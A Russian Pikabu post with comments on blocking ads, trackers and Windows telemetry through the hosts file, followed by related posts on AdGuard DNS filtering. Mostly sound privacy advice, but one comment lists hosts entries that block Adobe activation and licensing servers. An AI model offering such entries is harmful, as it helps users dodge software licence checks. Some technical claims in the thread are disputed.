537

Первый эшелон: блокировка интернет-шлака через HOSTS


Давным-давно, когда Интернета еще не было, человечество собиралась поработить компьютерная сеть SkyNet ARPANET, к которой на пике ее расцвета было подключено аж несколько сотен компов. Поэтому список всех существующих необходимых в работе сетевых ресурсов и их адреса хранились на каждом таком компьютере, в файле HOSTS.TXT


С тех пор к уже глобальной Сети подключили еще сколько-то миллиардов компьютеров, смартфонов, телевизоров, утюгов и других устройств, которым доступны миллиарды сайтов, IP-адреса которых постоянно меняются. В общем, все стало сложно, но файл HOSTS.TXT (ныне просто hosts) остался и работает так же, как и 30+ лет назад.


Если кратко и без зауми, то работает он так: вы в браузере набираете «pikabu.ru» и ваша Windows/Android/iOS первым делом лезет в файл hosts на вашем устройстве – проверить, не сказано ли там что-нибудь про искомый сайт. Если не сказано, тогда начинаются DNS-запросы во внешний мир и прочая суета, к делу не относящаяся, а вот если сказано... то смотря что.


Нас интересует не все богатство возможностей манипуляций с этим файлом, а лишь одно из возможных (и, к слову, нецелевое) его использований – в качестве первого эшелона обороны от разнообразного интернет-шлака – рекламы, счетчиков, трекеров и прочей гнуси, любезно подсовываемой нам сегодня каждым первым сайтом.


С помощью файла hosts мы можем сказать своей операционной системе: ресурса, к которому ты собираешься обратиться, согласно инструкциям, полученным на открытом нами сайте, не существует, даже не пытайся его загрузить. Говорится это так: в «Блокноте» открывается файл hosts (обычно находится в папке C:\Windows\System32\Drivers\Etc), в него добавляется строчка, например, 0.0.0.0 googleads.g.doubleclick.net после чего файл сохраняется.

Первый эшелон: блокировка интернет-шлака через HOSTS Файл hosts, Информационная безопасность, Windows, Android, Интернет, Длиннопост, Блокировка рекламы
Все, большинство шлака от рекламной сети Google даже не загружается на наш комп, а сама Корпорация Добра лишается одной из возможностей шпионить за нами. googleads.g.doubleclick.net – это доменное имя, ресурсы с которого мы загружать не хотим. 0.0.0.0 – адрес, на который мы принудительно переадресуем все запросы к доменному имени googleads.g.doubleclick.net В данном случае этот адрес будет расценен операционной системой, как заведомо несуществующий, и запрос к нему будет сброшен.
Первый эшелон: блокировка интернет-шлака через HOSTS Файл hosts, Информационная безопасность, Windows, Android, Интернет, Длиннопост, Блокировка рекламы

Как узнать, какие доменные имена стоит заблокировать в hosts? Самый простой способ – скачать один из готовых и регулярно обновляемых списков, например, MVPS HOSTS. Плюсы – все уже сделано за вас, минусы – те же самые: в список могли добавить что-то лишнее, что именно вам не мешает и даже наоборот, а чего-то, мешающее именно вам, могли и не добавить.


Я добавляю вручную, узнавая имена мешающих мне доменов с помощью инструментов разработчика, встроенных в Firefox (в Chrome есть аналог). Инструменты/Веб-разработка/Сеть, «Обновите», клик на колонке «Домен», чтобы отсортировать список открытых страницей подключений по доменным именам.

Первый эшелон: блокировка интернет-шлака через HOSTS Файл hosts, Информационная безопасность, Windows, Android, Интернет, Длиннопост, Блокировка рекламы

И вот, на примере сайта РБК, видим кучу доменных имен, которые мы не заказывали – счетчик, рекламная сеть, снова счетчик, опять счетчик, и еще раз счетчик... (читай – шпионский модуль), и это лишь то, что на скриншот влезло, а если прокрутить вниз, там еще сюрпризы будут. Вот их-то ручками, ручками – ничего лишнего, но и никто не спрячется. Видим в колонке «Статус» пустое место вместо «200» или иного кода – все правильно сделал!

Первый эшелон: блокировка интернет-шлака через HOSTS Файл hosts, Информационная безопасность, Windows, Android, Интернет, Длиннопост, Блокировка рекламы

Если же надо отловить самовольные запросы к посторонним доменам от других программ или самой операционной системы, на помощь приходит DNSQuerySniffer. Например, хочет Windows 10 слить в сеть «телеметрию» (строго в наших же интересах, конечно), а мы не хотим: запускаем DNSQuerySniffer, смотрим в реальном времени список доменных имен, к которым идут обращения, понимаем, что сами мы в этом время не обращались ни к одному из них, открываем файл hosts, copy/paste...


В чем недостатки способа блокировки через hosts и почему мы говорим лишь о первом (а значит, не единственном) эшелоне обороны от интернет-шлаков? Первый и главный – он не предусматривает возможности использовать «маски». Т.е., если нам надо заблокировать такие доменные имена:

1.doubleclick.net

2.doubleclick.net

...

99.doubleclick.net

нам придется их все, поименно добавлять в hosts, вместо того, чтобы добавить одну «маску» – *.doubleclick.net.


Второй: hosts позволяет заблокировать доступ к доменному имени вообще, для всех сразу, без исключений. Заблокировать доступ только браузеру, а почтовому клиенту оставить – невозможно, для этого нужен полноценный межсетевой экран (файрвол).


В остальном же – одни сплошные плюсы: изменения, внесенные в файл, активируются сразу; даже большой файл hosts не нагружает систему и не приводит к зависаниям браузера, логика работы списка блокированных доменов прозрачна. И, самое главное, заблокировать домен с мусором сможет даже не самый продвинутый пользователь ПК.

Первый эшелон: блокировка интернет-шлака через HOSTS Файл hosts, Информационная безопасность, Windows, Android, Интернет, Длиннопост, Блокировка рекламы

На закуску – немного дополнительных знаний, для интересующихся. Если не нашли ответа на свой вопрос – комменты открыты ;)


1. В Android файл hosts расположен в директории: /system/etc/ Права на файл (CHMOD): 644 (-rw-r-r--) Доступ к этой директории возможен лишь при наличии root-прав. Символ переноса строки в файле: LF (про это часто забывают, копируя файл из Windows).


2. Правильно посылать нежелательные домены на три буквы 0.0.0.0 (в Windows можно для краткости просто на 0), а не на 127.0.0.1 В контексте файла hosts 0.0.0.0 означает «несуществующий адрес», обращение к которому сразу приводит к завершению соединения. А 127.0.0.1 означает вполне себе существующий адрес – он служит для имитации обращения к тому же самому компьютеру из сети. Т.е. вместо сразу «нет такого адреса» мы получим через какое-то (пусть и небольшое) время «никто не отвечает». Хотя в некоторых случаях могут и ответить, что чревато сбоем системы.


3. Файл hosts – первый, но не единственный (и даже не главный) эшелон защиты компьютера от интернет-шлака. Не стоит забывать про межсетевой экран, системы контентной фильтрации, плагины для браузера с тем же назначением, да и просто грамотную настройку программ, вылезающих в Интернет. А для ценителей – локальные прокси, позволяющие вволю поглумиться над своим трафиком, прежде чем допускать его до браузера.

Найдены дубликаты

+12

1) примерно после 10000 записей в hosts начинают тормозить и жрать оперативу браузеры на всяких там i3/i5 - причем хуже, чем с адблоком;

2) Win10 умеет обходить блокировку адресов через этот файл.

раскрыть ветку 4
+3

1. Хм, не замечал даже когда MSVP стоял, а там побольше 10к записей...

2. ЕМНИП еще XP обходил для каких-то мелкософтовских адресов, если не 98. Вернее, не обходил, а обращался напрямую по IP, в этом случае hosts и не должен использоваться. Не подкинете ссылку, где почитать про обход в 10?

раскрыть ветку 3
0
MSVP
что за зверь?
раскрыть ветку 1
0

Ссылка, к сожалению, давненько утеряна. Читал в недрах хабра по темам телеметрии после Update 1 для Win10

+16

Как узнать, какие доменные имена стоит заблокировать в hosts?

Не переживайте, всё уже сделали:

https://www.someonewhocares.org/hosts/hosts


Полезные ссылки, где тоже можно скачать списки для блокировки:

adaway.org

mvps.org

malwaredomainlist.com

someonewhocares.org

раскрыть ветку 4
+2
127.0.0.1 www.2girls1cup.cc

Прям целый сайт сделали ?? Как же теперь отличить матёрого олдфага?

+2

Да я не переживаю, я ручками давно набил себе свою версию Рая ;) А вот с излишествами нехорошими в mvps.org лично сталкивался.

0
AdFree. Есть и под форточки и под ведро
раскрыть ветку 1
+2

Сижу с Umatrix горя не знаю

+4

"Первый эшелон" - это явно не HOSTS, а, как минимум, ваш первый сетевой интерфейс после сети провайдера. Дома это как правило маршрутизатор, который я рекомендую ставить свой личный, а не от провайдера - в этом случае и устройство выберете качественней и настроить сможете по своему вкусу. Вот на нём-то уже и можно выстроить первую линию защиты.

У меня дома например это недорогой TP-Link с прошивкой OpenWRT, где есть замечательный модуль AdBlock c GUI, который при очень легкой настройке (по вашему желанию и выбору) сам будет выкачивать списки тысяч сетей для блокировки и блокировать их непосредственно на маршрутизаторе, т.е. все домашние устройства, включая компьютеры, смартфоны, планшеты, телевизоры уже будут получать "очищенный" от рекламы и вредораспространителей трафик.

раскрыть ветку 3
+1

Тут не поспоришь, с научной точки зрения моя классификация хромает ;) Хотя... вот смотрите: выходите Вы со своим смартом из дома, и первым эшелоном у Вас становится сам смарт со своим локальным hosts ;)

раскрыть ветку 2
0

Ну тогда бы я это назвал скорей не "первый эшелон", а "последний рубеж" =)

раскрыть ветку 1
+6

Божечки, вот вы динозавтра то отрыли))

Ладно мы лет 10 назад его юзали, но сейчас то зачем? С таким то разнообразием АДблоков,  фаерволов и прочей лабуды?

Или приятно почувствовать себя немного одмином?))) жесть

раскрыть ветку 7
+1

Лет 10 назад были уже и файрволы, и адблоки в широком ассортименте. И httpS почти не было, так что AdMuncher рулил ;) Так и что с того, если старый инструмент успешно выполняет свою функцию и поныне?

раскрыть ветку 6
0
Успешно?? Это вообще можно назвать инструментом? Мы двигаемся к автоматизации всего, а вы предлагаете руками работать с hosts?? Что за деградация?
раскрыть ветку 5
раскрыть ветку 2
+4

Это для слабых духом. А  настоящие кулхакеры правят hosts.

раскрыть ветку 1
0
Иллюстрация к комментарию
+5

Плохо понимаю, какой в этом всем смысл, если честно. Есть адблок. Чем вам мешает то, что не блочится адблоком? Для особых случаев есть тор.

раскрыть ветку 3
+3

Ну например хром и соответственно все браузеры на хромиуме собираются убрать/кастрировать API который позволяет адблоку работать.

ещё комментарии
+1
У мну Адблок со стандартыми листами легко подвешивает браузер. С отключеными, когда я сам добавляю в него лишь то, что не заблокировать в hosts - полет нормальный. Т.е. этот способ мне нравится пренебрежительно малыми накладными расходами и возможностью блокировать загрузки не только для конкретного браузера, а вообще. Телеметрия, проверки обновлений, лицензий, подгрузки чего угодно рубятся со свистом.
+2

Хызы, что у вас там в винде сейчас, но вообще 0.0.0.0 (aka просто 0) - это localhost, а не несуществующий хост, со всеми вытекающими.

Лучше брать что-то из 192.0.2.0/24 (TEST-NET-1), 198.51.100.0/24 (TEST-NET-2),  203.0.113.0/24 (TEST-NET-3)



$ ping 0

PING 0 (127.0.0.1) 56(84) bytes of data.

64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.038 ms

64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.029 ms

^C

--- 0 ping statistics ---

2 packets transmitted, 2 received, 0% packet loss, time 999ms

rtt min/avg/max/mdev = 0.029/0.033/0.038/0.007 ms

раскрыть ветку 9
0

Нет, localhost - это 127.0.0.1

Что такое 0.0.0.0 - зависит от "контекста", но в контексте переадресации туда из hosts - будет "несуществующий адрес".

Отдадим должное Винде: тут обошлось без изобретения собственных стандартов вопреки RFC.

раскрыть ветку 8
+1

> Нет, localhost - это 127.0.0.1

Это не всегда верное утверждение. Как написано в hosts - так и будет. _Общепринятым_ (и захардкоженным в винде зачем-то) IPv4-адресом для хоста localhost является 127.0.0.1, IPv6 адресом ::1, но никто не запрещает изменить прописать в hosts любой другой - там весь 127.0.0.0/8 доступен

Мне вот 127.2.2.2 больше нравится, можно на него заменить:

:~$ ping 127.2.2.2

PING 127.2.2.2 (127.2.2.2) 56(84) bytes of data.

64 bytes from 127.2.2.2: icmp_seq=1 ttl=64 time=0.100 ms

^C

--- 127.2.2.2 ping statistics ---

1 packets transmitted, 1 received, 0% packet loss, time 0ms

rtt min/avg/max/mdev = 0.100/0.100/0.100/0.000 ms



> но в контексте переадресации туда из hosts - будет "несуществующий адрес".

Это тоже чушь. 0.0.0.0 никогда не был "несуществующим адресом". Если обращаться к русскоязычной документации, то это "неопределенный" адрес, а не несуществующий.

Но вообще-то этот адрес в RFC однозначно описано как "this host in this network". Если система посчитает, что "this host in this network" - это loopback, то трафик пойдет в 127.0.0.1. В данный момент linux-ы считают именно так (в том числе и андроиды), а BSD справедливо считает 0.0.0.0 адресом сети 0/8.


Ну а если в винде наконец-то решат соблюсти RFC - то ой, привет сворованные данные любым самым простеньким трояном. На андроиде-то хоть 80-й порт занять нельзя будет без рута.

раскрыть ветку 7
+4

Hosts - вредные советы

раскрыть ветку 20
+2

Обоснуйте.

раскрыть ветку 19
0

Реклама не показывается, бабло не капает.

0

Григория не читали?

раскрыть ветку 17
+1

https://adguard.com/ru/adguard-dns/overview.html


ну и для параноиков опенсурс решение селвхостед https://github.com/AdguardTeam/AdGuardHome  https://pi-hole.net/

раскрыть ветку 3
+1

Отдавать свой DNS-трафик куда-то налево? Блокировать одни трекеры, чтобы самому отдавать всю информацию другим? ;)

раскрыть ветку 2
+2

Pi-hole опенсорсный проект, можно почитать код и потом самому собрать его удостоверившись в чистоте от трекеров. Альтернативно можно настроить iptables чтобы контейнер докера, или firewall роутера чтобы малина/компьютер, на котором стоит pihole не имел доступа в внешний мир

раскрыть ветку 1
0

а как блокировать подобные? Всю ссылку вбивать чтоли? https://www.google.ru/ads/ga-audiences?v=1&aip=1&t=s...

Иллюстрация к комментарию
раскрыть ветку 8
0

hosts блокирует домены, а не URL, это надо в какой-нибудь AdBlock вбивать и в таком виде: ||www.google.ru/ads/*

раскрыть ветку 7
0

кстати, почему-то некоторые домены не блокируются. где-то 2 из 20

раскрыть ветку 6
0

я раньше тоже заморачивался с подобными экспериментами. но потом в самый неподходящий момент какая-нибудь очень нужная программа перестаёт работать и совершенно непонятно из-за чего. и выяснить это не представляется возможным после таких глобальных изменений в системе

раскрыть ветку 1
0

Тут поможет DNSQuerySniffer - им можно послушать, куда прога пытается залезть, и поискать этот домен в своем hosts.

0
Спасибо
0

А никто не встречал маленького локального днс-сервера, чтобы туда маски с адресами добавлять?
Я чет такое писал на питоне, но не взлетело, гнев, отрицание, торг, смирение, запой.

раскрыть ветку 1
+1

Чет такое встречал, но по названиям не подскажу. ИМХО надо копать в сторону локальных прокси, они может и без функций DNS, но работают в том же направлении. Вот это кажись ковырял http://handycache.ru но показалось из пушки по воробьям.

0

хех =) буквально через минуту после того как прочитал пост и переписал hosts =) на пикабушечке вдруг не робит рекламко =)

Иллюстрация к комментарию
0

Для рекламы в скайпе, в своё время блочили

0.0.0.0 rad.msn.com

0.0.0.0 preview.msn.com

0.0.0.0 rad.msn.com

0.0.0.0 apps.skype.com

0.0.0.0 api.skype.com

0.0.0.0 static.skypeassets.com

раскрыть ветку 8
0

фотошоп

127.0.0.1 na1r.services.adobe.com

127.0.0.1 hlrcv.stage.adobe.com

127.0.0.1 lmlicenses.wip4.adobe.com

127.0.0.1 lm.licenses.adobe.com

127.0.0.1 activate.adobe.com

127.0.0.1 practivate.adobe.com

торрент

127.0.0.1 router.bittorent.com

127.0.0.1 router.utorrent.com

127.0.0.1 update.utorrent.com

Крайняя версия торрента без рекламы - 2.0.4


Идеальный вариант ghostery+uBlock

Параноидальный ghostery+uMatrix

раскрыть ветку 7
0

Гостери +ублок+адгуард)

0

Как заблочить рекламу в uTorrent? qBittorrent)) А вообще рекламные блоки отключаются внутри в расширенных параметрах насколько помню

раскрыть ветку 4
0

Вот не надо так категорично, это от версии софта зависит, домены меняются периодически. uTorrent вроде как 2.2.1 признан последним кошерным, и там еще кой-чего стоит заблокировать:

0 download.utorrent.com

0 llsw.download3.utorrent.com

0 utorrent.com - да, сам сайт тоже :(

Но это строго для версии 2.2.1, другая версия - другие хосты могут быть.

0

А что наука говорит про МАСи?

раскрыть ветку 1
0

Все то же самое, искомый файл лежит там же, где и в Android.

0
0

Следующий шаг - установить что-то типа PiHole

раскрыть ветку 6
+1

Это то же самое, только самому ничего никуда не вписывать ценой того, что кто-то где-то как-то будет сам решать, что загрузить на Ваш комп. Так себе следующий шаг.

раскрыть ветку 5
+1

> что кто-то где-то как-то будет сам решать

добро пожаловать в опенсурс. у вас не линукс установлен? паранойа не мучает?

а если винда или мак, так за вами фбр уж точно давно следит

раскрыть ветку 3
0

Не то же самое. Не надо настраивать на каждом устройстве, только на точке доступа, плюс легче редактировать списки имен, потому что после такой процедуры почти всегда что-то ломается.

-3

На сегодня только самые убогие в смысле отсталые что-то через hosts блокируют...

раскрыть ветку 12
+1

Почему? Это очень удобно за счет мизерных накладных расходов. Тот же ADB может запросто браузер повесить.

раскрыть ветку 11
-1

Потому что блокируется только имя, по адресу спокойно ходит.

раскрыть ветку 10
-4

Епт, наденьте шапочку и фольги и узбагойтесь. Судя по такой унылой инфе, гуглу глубоко фиолетово какой прон вы смотрите и какой дилдо заказываете. Это же насколько скучно жить что бы с инструментом разработчика ползать по сайту и искать подозрительные ссылки.

-1

сейчас бывает что антивирусы видят что в hostst хоть что-то записано, и пишут "обнаружена непонятная активность, нужно срочно исправить!" и предлагают на пустой hosts заменить.

раскрыть ветку 16
+8

Хотите мое ИМХО? Такой антивирус после такого заявления сносить под корень. Просто потому, что "тут что-то странное" - это не диагноз "профессионала", это и блондинка, впервые севшая за комп, сама себе сказать может.

раскрыть ветку 10
+8

И какой же антивирус определит, что ваша запись в файле хостс

vk.com 1.2.3.4

- это  ваша личная заморочка, а совсем-совсем не деятельность вируса на компе, который хочет слямзить у вас пароль ВК таким вот образом?

ещё комментарии
0

Антивирусы обычно предупреждение дают, что хостс изменён. Норм реакция, тем более, что у большинства он чистенький, а есть много говна, которое любит хостс подзасрать

0

Каким антивирусом пользуетесь?

раскрыть ветку 3
0

обычно freedrweb, но жаловался не помню кто

-1

Никаким, когда-то давно hands.sys пропатчил и с тех пор не требуется.

раскрыть ветку 1
-3

Нахер такой антивирус сносите.

-8

Рекламу вы смотреть не хотите, а информацию получать хотите...

раскрыть ветку 3
+2

Ловите ссаного рекламщика

раскрыть ветку 1
-2

О хотите платные сайты?

+1

Виновен. Но еще больше я не хочу трекеров и вот этого всего.

ещё комментарии
-3

А почему  0.0.0.0? Почему не 127.0.0.1?

раскрыть ветку 9
0

Прочтите мой текст до конца, или хотя бы самый конец.

раскрыть ветку 8
0

Мне интересно, в чем будет разница для пользователя? Я, например, могу настроить ресолв так, чтобы хостс игнорировался, и иногда так делаю, если ушлые разрабы начинают менять его содержимое.

раскрыть ветку 7
Похожие посты
413

Ответ на пост «Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная)» 

Поясню всем, кто топит за adguard.

Автор топика то ли по недопониманию, то ли в рекламных целях умалчивает существенные факты:


1/ AdGuard - коммерческая компания. И основные деньги они делают на том, что их фильтры ПРОПУСКАЮТ рекламу. То есть они становятся паразитом на рекламодателях.


2/ Используя внешние DNS вы рассказываете этой системе, куда ходите. Да, это делают и google, и yandex. Смысл в том, что они собирают ваш рекламный профиль. И продают рекламодателям :)


3/ Если вы устанавливаете их сертификат, вы ползволяете сторонней конторе читать весь ваш интернет траффик. Кроме сбора информации это даёт просто безграничные возможности для атаки на вашу систему. То есть идёте ли вы в интернет-банк, ведёти ли личную переписку - всё доступно в adguard.


Тут я не буду строить конспирологических теорий о связях adguard с CIA / NSA, но в любой программе есть дыры. А дыры в программных комплексах с такими привилегиями очень лакомые.


Что я предлагаю?


1/ Во-первых не ставить в свою систему левые проги с невероятно широкими полномочиями. Совершенно не нужно рутировать своё устройство (если это androd)


2/ Использовать бразуер, который не пытается знать о вас всё (Google Chrome, Yandex Browser), а что-нибудь, что ставит приоритеты безопасности пользователя чуть выше. Mozilla Firefox


3/ Рекламу фильтровать простыми, эффективными и легковесными средствами. uBlock Origin,

в add-on'ах к пункту 2


Всё. 90% рекламы порежется. Ещё 9% можно добить руками, если умеете строить фильтрующие выражения

1047

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная)

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

Часть 2, заключительная, по многочисленным вопросам.

Итак, дорогие друзья, сегодня мы закончим статью, о блокировке рекламы в телефоне:


Так как у вас появилось много вопросов, сегодня их постараюсь закрыть.

1) Блокирует ли рекламу на YouTube?
- Нет. Так там используются другие алгоритмы для ее показа.
Будет отдельный пост, о том, что можно сделать в этом случае.

2) Где тогда блокируется реклама?
- В браузере, в скачанных/установленных приложениях и играх

3) У меня в игре пропали плюшки (золото/алмазы/монетки) за рекламу, что делать?
- Если в настройках указывали DNS сервер из 1 поста - то временно отключать во время игры
- Если поставите программу, из этого поста - указать игру в исключениях фильтрации

4) У меня нет DNS в настройках системы.
- Извиняюсь, мой косяк. Данная настройка появилась на 9 Андроиде, и если ее нет, значит у вас версия ниже, и сегодня вы узнаете, как поступить вам, и что можно сделать.

5) Нужен ли Root (Рут) доступ для этих настроек/установки программы?
- Нет

6) Будет ли после этих настроек показывать порно, и прочие радости мозолистой жизни?
- Да. Если не укажете дополнительно правила блокировки подобных сайтов

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

Итак, если у вас на телефоне не оказалось настройки DNS, тогда этот пост для вас.
Также, если вы хотите более детально настроить правила фильтрации, в отличие от первого поста, вам также сюда.

Заводим Белазы, выжимаем педаль газа в пол и погнали!

Разберем на примере AdBlock, т.к. он есть для обеих платформ (iOS и Android)

1) Скачиваете из магазина приложений.
Для iOS введя в поиске: AdGuard

Для Андроида скачать с офф. сайта: https://adguard.com/ru/download.html?os=android


Можете альтернативно погуглить AdGuard Premium apk.

Но лучше скачать и купить, так меньше шанс поймать вирус/троян на телефон, а также поддержать денежкой производителя этой полезной программы.


2) Выключаете фильтрацию в играх, где хотите получать золото/бриллианты за просмотр рекламы следующим образом:

3 полосы в левом верхнем углу > Настройки приложений > выбрать программу/игру где не будет резаться реклама > Защита AdGuard > отключить

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

3) Для тех, кто не хочет дальше заморачиваться - настройка на этом заканчивается :)
Скорее всего этого хватит, для нетребовательных повседневных нужд.

Ну, а для тех, кто хочет большего - продолжаем...

4) Настройки (со значком шестерёнки) > блокировка контента > фильтры > далее смотрим по скринам

4.1) Блокировка рекламы (основные правила для фильтрации рекламы)

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

4.2) Антитрекинг (продиводействие отслеживанию действий на страницах)

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

4.3) Виджеты социальных сетей (лайки, репосты и подписки и прочий мусор в... мусор) Если кто жить без этого не может - оставляйте

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

4.4) Безопасность (противодействие открытию нежелательных сайтов)

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

4.5) Раздражители (отключение визуального мусора на странице)

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

4.6) Языковые (включайте все фильтры, на русском обязательно, и на других языках - по желанию, и мере знания и посещения сайтов на этих языках)

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

4.7) Другие (пользователи iOS не забудьте включить фильтр для Сафари)

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

4.8) Собственные фильтры
Временно пропустим, их вы добавите по желанию

В итоге у вас получится примерно вот такая картина:

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

5) Фильтрация DNS
5.1) Выбранный DNS сервер - здесь выбираете на свой вкус и цвет.
Для примера и в качестве основного сервера для большинства поставим DNS от AdGuard
А если будете ставить для детей с фильтрацией порно - то выбирайте AdGuard Family Protection

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

5.2) В фильтрах DNS включите упрощённый фильтр доменных имён AdGuard

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

6) Антитрекинг
Выбирайте уровень "Высокий" или "Максимальный", в зависимости от своей паранойи, при посещении сайтов)
Либо сделайте индивидуальную настройку

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

7) Антифишинг оставляем так, как есть

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

8) Расширения настраиваете на свой вкус

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

9) Сеть > Алгоритм фильтрации


Если НЕТ ROOT прав, то выбираете "Локальный VPn"

Если ЕСТЬ ROOT права, то "Локальный HTTP прокси"


10) Фильтрация HTTPS

Лучше заранее спросить разрешение у своей паранойи на включение этого пункта меню.

Если сомневаетесь - лучше не включайте.

Лично у меня включен.

Как заблокировать рекламу в 2020 году, но уже за 5 минут (ч.2, заключительная) Раздражающая реклама, Телефон, Android, iPhone, DNS, Блокировка рекламы, Длиннопост

На этом расширенная настройка приложения заканчивается.

Этого будет более чем достаточно для 95% более искушённых пользователей, и тех, кто решил остановиться на 3 пункте, но потом передумал и завершил настройку)


А как же ещё 5%?

Ну, тех самых, требовательных)


А вот вам:

11) Пользовательские скрипты и правила

No Yandex Ads - https://greasyfork.org/scripts/809-no-yandex-ads/code/No Yandex Ads.user.js


RU AdList JS Fixes - https://greasyfork.org/scripts/19993-ru-adlist-js-fixes/code/RU AdList JS Fixes.user.js


Блокировщик всплывающей рекламы от AdGuard - https://greasyfork.org/scripts/33396-adguard-popup-blocker/code/AdGuard Popup Blocker.user.js


Прямые ссылки наружу - https://greasyfork.org/scripts/15857-direct-links-out/code/Direct links out.user.js

(Лучше анонимность,быстрее интернет,чистый джаваскрипт (без зависимостей))


Как устанавливать?

Открываете AdGuard, далее - Настройки - Расширения - Добавить расширения. В открывшимся окне,

в поле "Путь или ссылка" вставляете скопированную ссылку из указанных выше ссылок.

Потом, нажимаете кнопку "Далее" и следом за ней финишную кнопку "Добавить".

Скрипт установлен, ну а вы стали ещё прекрасней и великолепней, а ваш интернет стал ещё чище :)


Дорогие друзья, прежде, чем писать в комментарии, что что-то не получается, почитайте полную статью на 4pda:

https://4pda.ru/forum/index.php?showtopic=601691


В ней вы найдете большинство ответов на выявленные проблемы с настройкой, а также на возникшие вопросы, ответов на которые здесь вы не нашли, пока читали статью :)


Пы.Сы. А как-же альтернатива AdGuard'y, спросите вы?)

Ок, если хотите альтернатив, то вот:


AdBlock Plus: https://4pda.ru/forum/index.php?showtopic=403121


AdAway: https://4pda.ru/forum/index.php?showtopic=275091


Block this: https://4pda.ru/forum/index.php?showtopic=739601


Отдельная благодарность всем авторам 4pda, которые проделали такой большой труд.


На этом пост заканчивается, а тех, кого заинтересовала тема - путь к познанию Дао в блокировке рекламы только начинается.


Всем Дзен :)

Показать полностью 16
12017

Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии

Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост

Читал аналогичный пост, написанный 2 дня назад для ПК, и судя по комментариям, вопрос животрепещущий, т.к. бо́льшую часть времени мы всё-же проводим с телефоном в обнимку)

Итак, как заблокировать надоедливую рекламу, всплывающую в приложениях, при просмотре сайтов, принудительно открывающуюся в играх, и всё это без шаманских танцов с бубном, сторонних программ и платных sms на короткие номера?)

Всё просто!

Для Android:
Настройки > в поисковой строке пишем "DNS" > Персональный DNS сервер > Имя хоста DNS > прописываем "dns.adguard.com > Profit!
Вы прекрасны, великолепны и у вас теперь нет рекламы!))
Для визуалов, ниже в картинках, как это сделать:

Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост

! В разных прошивках и у разных производителей название может различаться, поэтому смотрите, чтобы слово "DNS" было в пункте меню !

Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост

Для Xiaomi и кастомных прошивок на его основе (MIUI) может потребоваться дополнительное приложение, если не отображает этот пункт меню:

Скачиваем с Play Маркета программу:
Hidden Settings for MIUI
https://play.google.com/store/apps/details?id=com.ceyhan.set...

Далее там выбираем пункт "Private DNS" и также прописываем настройку.

Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост
Блокировка ВСЕЙ рекламы в телефоне за 1 минуту в 2020 году бесплатно и без sms :) а также ограждаем ваших деток от просмотра порнографии DNS, Настройка, Android, iOS, iPhone, iPad, Windows, Раздражающая реклама, Длиннопост

Если у вас не находит данный пункт меню в телефоне, просто поищите в Гугле, по фразе:
Как настроить DNS на Samsung A10 (представьте свое название производителя и модели)

А как-же владельцы iPhone и iPad спросите вы?
А никак! Ябочники должны страдать!
Ну, или покупать настройку всего за 19,99$
Муа-ха-ха-ха! "Зловещий смех"))

